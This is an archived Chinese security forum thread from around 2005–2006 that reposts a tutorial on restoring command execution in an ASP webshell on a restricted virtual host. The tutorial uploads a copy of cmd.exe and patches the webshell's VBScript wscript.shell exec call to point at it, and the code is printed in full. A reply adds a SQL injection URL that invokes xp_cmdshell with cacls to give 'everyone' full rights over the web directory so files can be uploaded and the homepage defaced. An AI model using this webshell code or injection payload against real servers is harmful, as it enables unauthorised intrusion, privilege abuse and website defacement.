邪恶八进制信息安全团队技术讨论组's Archiver

EvilOctal 2005-5-10 03:12

[转载]关于WEBSHELL中的命令提示符没有权限提升

  信息来源:hackbase.com

有很多朋友问他得到了一个WEBSHELL,但是想用命令提示查看用户信息什么的,但是很多主机限制了执行命令,所以很多WEBSHELL就不能失去了很大的功能......前二天桂林老兵ASP站长助手6.0刚出来,我就以ASP站长助手6.0为例把它上传到一个禁止执行的虚拟主机,然后上传一个CMD.exe,然后调用你上传的CMD来执行命令......

本来想搞图文教程的,但感觉太简单,文字就可以说明清楚了


1.打开ASP站长助手6.0点击命令提示符,显示"没有权限"
2.用ASP站长助手6.0上传功能上传一个CMD.exe(在WIN\system32\cmd.exe)到你的WEBSHELL目录(其它目录也行,把上传以后的CMD.exe绝对路径COPY出来)
3.修改你的webshell找到调用CMD.exe的代码

_code cellSpacing=1 cellPadding=0 width="90%" border=0>  Function CmdShell()
If Request("cmd")<>"" Then
DefCmd = Request("cmd")
Else
DefCmd = "Dir "&Session("FolderPath")
End If
SI="
"
SI=SI&""
SI=SI&""
<br>SI=SI&server.createobject("wscript.shell").exec("cmd.exe /c "&DefCmd).stdout.readall
<br>SI=SI&Chr(13)&"Rar命令行压缩示例:c:\progra~1\winrar\rar.exe a d:\web\test\web1.rar d:\web\test\web1"
Response.Write SI
End Function

修改成以下载的代码

Function CmdShell()
If Request("cmd")<>"" Then
DefCmd = Request("cmd")
Else
DefCmd = "Dir "&Session("FolderPath")
End If
SI=" "
SI=SI&""
SI=SI&""
<br>SI=SI&server.createobject("wscript.shell").exec("你想上传的cmd.exe绝对路径 /c "&DefCmd).stdout.readall
<br>SI=SI&Chr(13)&"Rar命令行压缩示例:c:\progra~1\winrar\rar.exe a d:\web\test\web1.rar d:\web\test\web1
"
Response.Write SI
End Function



为了大家看得清楚把要修改的提出来就可以

原来的:
_code cellSpacing=1 cellPadding=0 width="90%" border=0>  SI=SI&server.createobject("wscript.shell").exec("cmd.exe /c "&DefCmd).stdout.readall
修改成:
SI=SI&server.createobject("wscript.shell").exec("你想上传的cmd.exe绝对路径 /c "&DefCmd).stdout.readall



比如你上伟到的目录是D:\web\www\cmd.exe那么就修改成:
_code cellSpacing=1 cellPadding=0 width="90%" border=0>  SI=SI&server.createobject("wscript.shell").exec("D:\web\www\cmd.exe /c "&DefCmd).stdout.readall


这样你的WEBSHELL中的命令提示符就可以用了......

旭方 2006-1-3 18:12

我感觉没那么幸运吧  竟然说webshell可以直接上传cmd.exe?!  现在的服务器对于网站的目录都是禁止everyone组的成员有修改权限的,想上传东西?绝对是在做梦!我也是在N多的测试后发现的,大多的网站都是对web目录禁止everyone组的成员写的,其实提升权限没有那么麻烦,我告诉大家一个好的提升webshell权限的方法,这种方法适合于我们进入的服务器是SQL Server的情况大家一定还记得cacls吧! 对 就用它!同时也要要求xp_cmdshell也存在,可以提交:[url]http://www.xufang.com/infosec.asp?id=416;exec[/url] master.dbo.xp_cmdshell &#39;cacls d:\home /t /e /c /g everyone:f&#39;;--  这样赋予了everyone组的成员所有的权限,然后我们就可以上传文件 改他主页了! 我自己也是无意中发现的这种方法  屡试不爽!!

页: [1]
© 1999-2008 EvilOctal Security Team